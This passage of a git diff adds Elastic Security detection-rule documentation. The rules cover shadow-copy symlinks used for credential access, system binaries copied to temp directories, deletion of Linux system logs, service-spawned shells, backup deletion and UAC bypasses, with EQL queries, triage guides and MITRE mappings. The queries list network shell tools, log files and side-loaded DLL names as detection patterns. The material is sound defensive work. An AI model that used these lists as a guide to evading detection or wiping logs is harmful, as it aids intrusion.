lateral movement. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Determine if a volume shadow copy was recently created on this endpoint. +- Review privileges of the end user as this requires administrative access. +- Verify if the ntds.dit file was successfully copied and determine its copy destination. +- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe. +- Investigate recent deletions of volume shadow copies. +- Identify other files potentially copied from volume shadow copy paths directly. + +### False positive analysis + +- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the entire domain or the `krbtgt` user was compromised: + - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user. +- Locate and remove static files copied from volume shadow copies. +- Command-Line tool mklink should require administrative access by default unless in developer mode. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +Ensure advanced audit policies for Windows are enabled, specifically: +Object Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested) + +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +System Audit Policies > +Object Access > +Audit File System (Success,Failure) +Audit Handle Manipulation (Success,Failure) +``` + +This event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments. +Direct access to a shell and calling symbolic link creation tools will not generate an event matching this rule. + +If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name in ("Cmd.Exe","PowerShell.EXE") and + + /* Create Symbolic Link to Shadow Copies */ + process.args : ("*mklink*", "*SymbolicLink*") and process.command_line : ("*HarddiskVolumeShadowCopy*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc new file mode 100644 index 0000000000..9e91dd19dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc @@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory]] +=== System Binary Copied and/or Moved to Suspicious Directory + +This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name in ("cp", "mv") and process.args : ( + // Shells + "/bin/*sh", "/usr/bin/*sh", + + // Interpreters + "/bin/python*", "/usr/bin/python*", "/bin/php*", "/usr/bin/php*", "/bin/ruby*", "/usr/bin/ruby*", "/bin/perl*", + "/usr/bin/perl*", "/bin/lua*", "/usr/bin/lua*", "/bin/java*", "/usr/bin/java*", + + // Compilers + "/bin/gcc*", "/usr/bin/gcc*", "/bin/g++*", "/usr/bin/g++*", "/bin/cc", "/usr/bin/cc", + + // Suspicious utilities + "/bin/nc", "/usr/bin/nc", "/bin/ncat", "/usr/bin/ncat", "/bin/netcat", "/usr/bin/netcat", "/bin/nc.openbsd", + "/usr/bin/nc.openbsd", "/bin/*awk", "/usr/bin/*awk", "/bin/socat", "/usr/bin/socat", "/bin/openssl", + "/usr/bin/openssl", "/bin/telnet", "/usr/bin/telnet", "/bin/mkfifo", "/usr/bin/mkfifo", "/bin/mknod", + "/usr/bin/mknod", "/bin/ping*", "/usr/bin/ping*", "/bin/nmap", "/usr/bin/nmap", + + // System utilities + "/bin/ls", "/usr/bin/ls", "/bin/cat", "/usr/bin/cat", "/bin/sudo", "/usr/bin/sudo", "/bin/curl", "/usr/bin/curl", + "/bin/wget", "/usr/bin/wget", "/bin/tmux", "/usr/bin/tmux", "/bin/screen", "/usr/bin/screen", "/bin/ssh", + "/usr/bin/ssh", "/bin/ftp", "/usr/bin/ftp" + ) and not process.parent.name in ("dracut-install", "apticron", "generate-from-dir", "platform-python")] + [file where host.os.type == "linux" and event.action == "creation" and file.path : ( + "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*" + )] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc new file mode 100644 index 0000000000..3b24aebc16 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc @@ -0,0 +1,83 @@ +[[prebuilt-rule-8-10-5-system-log-file-deletion]] +=== System Log File Deletion + +Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "deletion" and + file.path : + ( + "/var/run/utmp", + "/var/log/wtmp", + "/var/log/btmp", + "/var/log/lastlog", + "/var/log/faillog", + "/var/log/syslog", + "/var/log/messages", + "/var/log/secure", + "/var/log/auth.log", + "/var/log/boot.log", + "/var/log/kern.log" + ) and + not process.name in ("gzip", "executor", "dockerd") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Linux or Mac System Logs +** ID: T1070.002 +** Reference URL: https://attack.mitre.org/techniques/T1070/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc new file mode 100644 index 0000000000..23e59745e6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-10-5-system-shells-via-services]] +=== System Shells via Services + +Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating System Shells via Services + +Attackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads. + +This rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045). + - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Check for commands executed under the spawned shell. + +### False positive analysis + +- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the service or restore it to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "services.exe" and + process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") and + + /* Third party FP's */ + not process.args : "NVDisplay.ContainerLocalSystem" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc new file mode 100644 index 0000000000..0743e53976 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc @@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-temporarily-scheduled-task-creation]] +=== Temporarily Scheduled Task Creation + +Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m + [iam where event.action == "scheduled-task-created" and not user.name : "*$"] + [iam where event.action == "scheduled-task-deleted" and not user.name : "*$"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc new file mode 100644 index 0000000000..1ee8b35c3c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process]] +=== Third-party Backup Files Deleted via Unexpected Process + +Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Third-party Backup Files Deleted via Unexpected Process + +Backups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing data recovery, making them a valuable target. + +Attackers can delete backups from the host and gain access to backup servers to remove centralized backups for the environment, ensuring that victims have no alternatives to paying the ransom. + +This rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete Veritas or Veeam backups. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check if any files on the host machine have been encrypted. + +### False positive analysis + +- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are not from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together. + +### Related rules + +- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "deletion" and + ( + /* Veeam Related Backup Files */ + (file.extension : ("VBK", "VIB", "VBM") and + not ( + process.executable : ("?:\\Windows\\*", "?:\\Program Files\\*", "?:\\Program Files (x86)\\*") and + (process.code_signature.trusted == true and process.code_signature.subject_name : "Veeam Software Group GmbH") + )) or + + /* Veritas Backup Exec Related Backup File */ + (file.extension : "BKF" and + not process.executable : ("?:\\Program Files\\Veritas\\Backup Exec\\*", + "?:\\Program Files (x86)\\Veritas\\Backup Exec\\*") and + not file.path : ("?:\\ProgramData\\Trend Micro\\*", + "?:\\Program Files (x86)\\Trend Micro\\*", + "?:\\$RECYCLE.BIN\\*")) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc new file mode 100644 index 0000000000..59c158edad --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc @@ -0,0 +1,108 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer]] +=== UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer + +Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.executable : "C:\\*\\AppData\\*\\Temp\\IDC*.tmp\\*.exe" and + process.parent.name : "ieinstal.exe" and process.parent.args : "-Embedding" + + /* uncomment once in winlogbeat */ + /* and not (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true) */ + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc new file mode 100644 index 0000000000..6db258345c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc @@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface]] +=== UAC Bypass Attempt via Privileged IFileOperation COM Interface + +Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/hfiref0x/UACME +* https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type : "change" and process.name : "dllhost.exe" and + /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */ + file.name : ("wow64log.dll", "comctl32.dll", "DismCore.dll", "OskSupport.dll", "duser.dll", "Accessibility.ni.dll") and + /* has no impact on rule logic just to avoid OS install related FPs */ + not file.path : ("C:\\Windows\\SoftwareDistribution\\*", "C:\\Windows\\WinSxS\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc new file mode 100644 index 0000000000..dd5e7bf2f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc @@ -0,0 +1,151 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading]] +=== UAC Bypass Attempt via Windows Directory Masquerading + +Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating UAC Bypass Attempt via Windows Directory Masquerading + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). + +This rule identifies an attempt to bypass User Account Control (UAC) by 